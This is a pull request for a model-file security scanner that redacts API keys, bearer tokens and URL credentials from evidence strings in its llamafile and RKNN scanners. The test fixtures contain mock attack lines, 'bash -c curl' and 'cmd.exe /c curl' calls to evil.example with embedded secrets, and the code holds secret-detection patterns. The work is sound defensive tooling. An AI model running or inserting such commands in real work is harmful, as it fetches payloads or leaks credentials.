### PR TITLE
fix(scanners): redact evidence secrets

### DIFF
--- a/modelaudit/scanners/_evidence_redaction.py
+++ b/modelaudit/scanners/_evidence_redaction.py
@@ -1,0 +1,92 @@
+"""Helpers for storing scanner evidence without embedded secrets."""
+
+from __future__ import annotations
+
+import re
+from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit
+
+REDACTED_EVIDENCE_VALUE = "<redacted>"
+REDACTED_URL_CREDENTIALS = "<credentials-redacted>"
+
+URL_RE = re.compile(r"(?i)\b(?:https?|ftp|s3|gs|file)://[^\s\"'<>]+")
+SENSITIVE_QUERY_KEYS = {
+    "access_key",
+    "access-key",
+    "access_token",
+    "access-token",
+    "api_key",
+    "api-key",
+    "apikey",
+    "credential",
+    "password",
+    "passwd",
+    "sas",
+    "secret",
+    "sig",
+    "signature",
+    "token",
+    "x-amz-credential",
+    "x-amz-security-token",
+    "x-amz-signature",
+}
+AUTHORIZATION_VALUE_RE = re.compile(r"(?i)(\bauthorization\s*[:=]\s*(?:(?:bearer|basic)\s+)?)" r"[^\s\"';&|]+")
+BEARER_VALUE_RE = re.compile(r"(?i)(\bbearer\s+)[A-Za-z0-9._~+/=-]{8,}")
+SENSITIVE_ASSIGNMENT_RE = re.compile(
+    r"(?i)\b((?:api[_-]?key|access[_-]?token|token|password|passwd|secret|credential|signature|sig|sas)"
+    r"\s*[:=]\s*)[^\s\"';&|]+"
+)
+QUOTED_SENSITIVE_ASSIGNMENT_RE = re.compile(
+    r"(?i)\b((?:api[_-]?key|access[_-]?token|token|password|passwd|secret|credential|signature|sig|sas)"
+    r"\s*[:=]\s*)([\"']).*?\2"
+)
+
+
+def _redact_url(match: re.Match[str]) -> str:
+    raw_url = match.group(0)
+    try:
+        parsed = urlsplit(raw_url)
+    except ValueError:
+        return raw_url
+
+    netloc = parsed.netloc
+    if "@" in netloc:
+        netloc = f"{REDACTED_URL_CREDENTIALS}@{netloc.rsplit('@', 1)[1]}"
+
+    query_items = []
+    for key, value in parse_qsl(parsed.query, keep_blank_values=True):
+        if key.lower() in SENSITIVE_QUERY_KEYS:
+            query_items.append((key, REDACTED_EVIDENCE_VALUE))
+        else:
+            query_items.append((key, value))
+
+    return urlunsplit(
+        (
+            parsed.scheme,
+            netloc,
+            parsed.path,
+            urlencode(query_items, doseq=True, safe="<>"),
+            "",
+        )
+    )
+
+
+def _redact_quoted_assignment(match: re.Match[str]) -> str:
+    return f"{match.group(1)}{match.group(2)}{REDACTED_EVIDENCE_VALUE}{match.group(2)}"
+
+
+def _truncate(text: str, max_chars: int) -> str:
+    if len(text) <= max_chars:
+        return text
+    if max_chars <= 3:
+        return text[:max_chars]
+    return f"{text[: max_chars - 3]}..."
+
+
+def redact_evidence_string(text: str, max_chars: int = 180) -> str:
+    """Redact credentials from a scanner evidence string before truncating it."""
+    redacted = URL_RE.sub(_redact_url, text)
+    redacted = QUOTED_SENSITIVE_ASSIGNMENT_RE.sub(_redact_quoted_assignment, redacted)
+    redacted = AUTHORIZATION_VALUE_RE.sub(rf"\1{REDACTED_EVIDENCE_VALUE}", redacted)
+    redacted = BEARER_VALUE_RE.sub(rf"\1{REDACTED_EVIDENCE_VALUE}", redacted)
+    redacted = SENSITIVE_ASSIGNMENT_RE.sub(rf"\1{REDACTED_EVIDENCE_VALUE}", redacted)
+    return _truncate(redacted, max_chars)

--- a/modelaudit/scanners/_evidence_redaction.py
+++ b/modelaudit/scanners/_evidence_redaction.py
@@ -3,39 +3,44 @@
 from __future__ import annotations
 
 import re
+from typing import Final
 from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit
 
-REDACTED_EVIDENCE_VALUE = "<redacted>"
-REDACTED_URL_CREDENTIALS = "<credentials-redacted>"
+REDACTED_EVIDENCE_VALUE: Final[str] = "<redacted>"
+REDACTED_URL_CREDENTIALS: Final[str] = "<credentials-redacted>"
 
-URL_RE = re.compile(r"(?i)\b(?:https?|ftp|s3|gs|file)://[^\s\"'<>]+")
-SENSITIVE_QUERY_KEYS = {
-    "access_key",
-    "access-key",
-    "access_token",
-    "access-token",
-    "api_key",
-    "api-key",
-    "apikey",
-    "credential",
-    "password",
-    "passwd",
-    "sas",
-    "secret",
-    "sig",
-    "signature",
-    "token",
-    "x-amz-credential",
-    "x-amz-security-token",
-    "x-amz-signature",
-}
-AUTHORIZATION_VALUE_RE = re.compile(r"(?i)(\bauthorization\s*[:=]\s*(?:(?:bearer|basic)\s+)?)" r"[^\s\"';&|]+")
-BEARER_VALUE_RE = re.compile(r"(?i)(\bbearer\s+)[A-Za-z0-9._~+/=-]{8,}")
-SENSITIVE_ASSIGNMENT_RE = re.compile(
+URL_RE: Final[re.Pattern[str]] = re.compile(r"(?i)\b(?:https?|ftp|s3|gs|file)://[^\s\"'<>]+")
+SENSITIVE_QUERY_KEYS: Final[frozenset[str]] = frozenset(
+    {
+        "access_key",
+        "access-key",
+        "access_token",
+        "access-token",
+        "api_key",
+        "api-key",
+        "apikey",
+        "credential",
+        "password",
+        "passwd",
+        "sas",
+        "secret",
+        "sig",
+        "signature",
+        "token",
+        "x-amz-credential",
+        "x-amz-security-token",
+        "x-amz-signature",
+    }
+)
+AUTHORIZATION_VALUE_RE: Final[re.Pattern[str]] = re.compile(
+    r"(?i)(\bauthorization\s*[:=]\s*(?:(?:bearer|basic)\s+)?)" r"[^\s\"';&|]+"
+)
+BEARER_VALUE_RE: Final[re.Pattern[str]] = re.compile(r"(?i)(\bbearer\s+)[A-Za-z0-9._~+/=-]{8,}")
+SENSITIVE_ASSIGNMENT_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)\b((?:api[_-]?key|access[_-]?token|token|password|passwd|secret|credential|signature|sig|sas)"
     r"\s*[:=]\s*)[^\s\"';&|]+"
 )
-QUOTED_SENSITIVE_ASSIGNMENT_RE = re.compile(
+QUOTED_SENSITIVE_ASSIGNMENT_RE: Final[re.Pattern[str]] = re.compile(
     r"(?i)\b((?:api[_-]?key|access[_-]?token|token|password|passwd|secret|credential|signature|sig|sas)"
     r"\s*[:=]\s*)([\"']).*?\2"
 )

--- a/modelaudit/scanners/llamafile_scanner.py
+++ b/modelaudit/scanners/llamafile_scanner.py
@@ -9,6 +9,7 @@ import tempfile
 from pathlib import Path
 from typing import Any, ClassVar
 
+from ._evidence_redaction import redact_evidence_string
 from .base import BaseScanner, CheckStatus, IssueSeverity, ScanResult
 
 LLAMAFILE_MARKER = b"llamafile"
@@ -257,10 +258,10 @@ class LlamafileScanner(BaseScanner):
             lowered = text.lower()
             for token in COMMAND_TOKENS:
                 if token in lowered:
-                    command_hits.add(text[:200])
+                    command_hits.add(redact_evidence_string(text, max_chars=200))
             for token in NETWORK_TOKENS:
                 if token in lowered:
-                    network_hits.add(text[:200])
+                    network_hits.add(redact_evidence_string(text, max_chars=200))
 
         if not command_hits and not network_hits:
             return

--- a/modelaudit/scanners/llamafile_scanner.py
+++ b/modelaudit/scanners/llamafile_scanner.py
@@ -256,12 +256,16 @@ class LlamafileScanner(BaseScanner):
             if self._is_known_runtime_string(text):
                 continue
             lowered = text.lower()
-            for token in COMMAND_TOKENS:
-                if token in lowered:
-                    command_hits.add(redact_evidence_string(text, max_chars=200))
-            for token in NETWORK_TOKENS:
-                if token in lowered:
-                    network_hits.add(redact_evidence_string(text, max_chars=200))
+            has_command_token = any(token in lowered for token in COMMAND_TOKENS)
+            has_network_token = any(token in lowered for token in NETWORK_TOKENS)
+            if not has_command_token and not has_network_token:
+                continue
+
+            redacted_text = redact_evidence_string(text, max_chars=200)
+            if has_command_token:
+                command_hits.add(redacted_text)
+            if has_network_token:
+                network_hits.add(redacted_text)
 
         if not command_hits and not network_hits:
             return

--- a/modelaudit/scanners/rknn_scanner.py
+++ b/modelaudit/scanners/rknn_scanner.py
@@ -8,6 +8,7 @@ import re
 from pathlib import Path
 from typing import Any, ClassVar
 
+from ._evidence_redaction import redact_evidence_string
 from ._string_extraction import extract_bounded_printable_strings
 from .base import BaseScanner, IssueSeverity, ScanResult
 
@@ -268,9 +269,7 @@ class RknnScanner(BaseScanner):
 
     @staticmethod
     def _snippet(text: str, max_chars: int = 180) -> str:
-        if len(text) <= max_chars:
-            return text
-        return text[: max_chars - 3] + "..."
+        return redact_evidence_string(text, max_chars=max_chars)
 
     def _check_path_references(self, path: str, extracted_strings: list[str], result: ScanResult) -> None:
         risky_references: list[dict[str, str]] = []

--- a/tests/scanners/test_llamafile_scanner.py
+++ b/tests/scanners/test_llamafile_scanner.py
@@ -68,6 +68,32 @@ def test_llamafile_scanner_flags_suspicious_runtime_strings(tmp_path: Path) -> N
     assert any(issue.severity == IssueSeverity.CRITICAL for issue in runtime_issues)
 
 
+def test_llamafile_scanner_redacts_sensitive_runtime_evidence(tmp_path: Path) -> None:
+    binary = tmp_path / "sensitive-runtime.llamafile"
+    binary.write_bytes(
+        _build_llamafile_blob(
+            runtime_lines=[
+                'bash -c curl -H "Authorization: Bearer sk-runtime-secret1234567890" '
+                "https://user:pass123@evil.example/payload?token=tok_runtime",
+            ]
+        )
+    )
+
+    result = LlamafileScanner().scan(str(binary))
+
+    runtime_issues = [issue for issue in result.issues if "Executable runtime contains" in issue.message]
+    assert runtime_issues
+    assert any(issue.severity == IssueSeverity.CRITICAL for issue in runtime_issues)
+
+    details = repr(runtime_issues[0].details)
+    assert "sk-runtime-secret" not in details
+    assert "pass123" not in details
+    assert "tok_runtime" not in details
+    assert "curl" in details
+    assert "evil.example" in details
+    assert "<redacted>" in details
+
+
 def test_llamafile_scanner_does_not_skip_mixed_safe_and_suspicious_runtime_string(tmp_path: Path) -> None:
     binary = tmp_path / "mixed.llamafile"
     binary.write_bytes(

--- a/tests/scanners/test_rknn_scanner.py
+++ b/tests/scanners/test_rknn_scanner.py
@@ -64,6 +64,40 @@ def test_scan_detects_correlated_command_and_network_indicators(tmp_path: Path) 
     assert correlated[0].severity == IssueSeverity.CRITICAL
 
 
+def test_rknn_redacts_sensitive_evidence_in_findings(tmp_path: Path) -> None:
+    payload = (
+        b"RKNN\x01\x00\x00\x00"
+        b"callback=https://user:secretpass@evil.example/collect?access_token=tok_12345\n"
+        b'notes=cmd.exe /c curl -H "Authorization: Bearer sk-testsecret1234567890" '
+        b"https://evil.example/payload?api_key=key_12345\n"
+    )
+    path = _write_rknn_file(tmp_path, payload, filename="redacted.rknn")
+
+    result = RknnScanner().scan(str(path))
+
+    path_reference = [
+        check
+        for check in result.checks
+        if check.name == "RKNN Path Reference Validation" and check.status == CheckStatus.FAILED
+    ]
+    correlated = [
+        check
+        for check in result.checks
+        if check.name == "RKNN Command and Network Indicator Correlation" and check.status == CheckStatus.FAILED
+    ]
+    assert len(path_reference) == 1
+    assert len(correlated) == 1
+
+    details = repr(path_reference[0].details) + repr(correlated[0].details)
+    assert "secretpass" not in details
+    assert "tok_12345" not in details
+    assert "sk-testsecret" not in details
+    assert "key_12345" not in details
+    assert "evil.example" in details
+    assert "curl" in details
+    assert "<redacted>" in details
+
+
 def test_scan_handles_truncated_rknn_gracefully(tmp_path: Path) -> None:
     path = _write_rknn_file(tmp_path, b"RKNN", filename="truncated.rknn")
 


### PR DESCRIPTION
Redact credentials from RKNN and llamafile evidence strings.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **Bug Fixes**
  * Scanner evidence now redacts credentials, API keys, bearer tokens, and authorization headers from findings to prevent exposure of sensitive information in scan results.

* **Tests**
  * Added tests verifying sensitive data redaction in scanner findings.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->